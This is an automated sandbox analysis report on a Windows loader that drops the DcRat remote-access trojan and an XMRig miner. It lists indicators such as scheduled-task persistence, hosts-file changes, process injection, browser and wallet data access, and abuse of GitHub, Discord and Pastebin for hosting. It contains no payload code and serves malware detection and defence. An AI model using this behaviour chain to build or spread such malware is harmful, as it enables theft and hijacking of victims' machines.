Malware Analysis Report

2024-12-07 17:42

Sample ID 241112-wl38dswrew
Target LunoLoader_pixelplanet.fun.exe
SHA256 7454fcc2c2c9e1b2c9ea16874d70fbfcfdf7823f4ed79d91e6dfbdeadc47d88b
Tags
dcrat xmrig collection credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation rat spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7454fcc2c2c9e1b2c9ea16874d70fbfcfdf7823f4ed79d91e6dfbdeadc47d88b

Threat Level: Known bad

The file LunoLoader_pixelplanet.fun.exe was found to be: Known bad.

Malicious Activity Summary

dcrat xmrig collection credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation rat spyware stealer upx

xmrig

Process spawned unexpected child process

Xmrig family

Dcrat family

DcRat

DCRat payload

XMRig Miner payload

Creates new service(s)

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Stops running service(s)

Clipboard Data

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Power Settings

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

UPX packed file

Hide Artifacts: Hidden Files and Directories

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Wi-Fi Discovery

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

System Location Discovery: System Language Discovery

Browser Information Discovery

Uses Volume Shadow Copy service COM API

Modifies data under HKEY_USERS

Runs ping.exe

Modifies registry class

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Detects videocard installed

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Gathers system information

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-12 18:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 18:01

Reported

2024-11-12 18:02

Platform

win11-20241007-en

Max time kernel

53s

Max time network

53s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe"

Signatures

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Xmrig family

xmrig

xmrig

miner xmrig

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Stops running service(s)

evasion execution

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A pastebin.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2844 set thread context of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 set thread context of 1984 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files (x86)\Windows Media Player\fr-FR\5940a34987c991 C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files\Microsoft Office\root\loc\System.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\loc\System.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files\Microsoft Office\root\loc\27d1bcfc3c54e0 C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\fr-FR\OfficeClickToRun.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Windows\fr-FR\e6c9b481da804f C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Windows\CSC\powershell.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\conhost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Recovery\WindowsRE\wininit.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe N/A
N/A N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe N/A
N/A N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe N/A
N/A N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe N/A
N/A N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe N/A
N/A N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe N/A
N/A N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4900 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe
PID 4900 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe
PID 1180 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
PID 1180 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
PID 1180 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
PID 2096 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe C:\Windows\SysWOW64\WScript.exe
PID 2096 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe C:\Windows\SysWOW64\WScript.exe
PID 2096 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe C:\Windows\SysWOW64\WScript.exe
PID 1180 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe
PID 1180 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 1180 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
PID 1180 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1984 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1984 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1984 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1984 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 wrote to memory of 1984 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2004 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
PID 2004 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
PID 2360 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
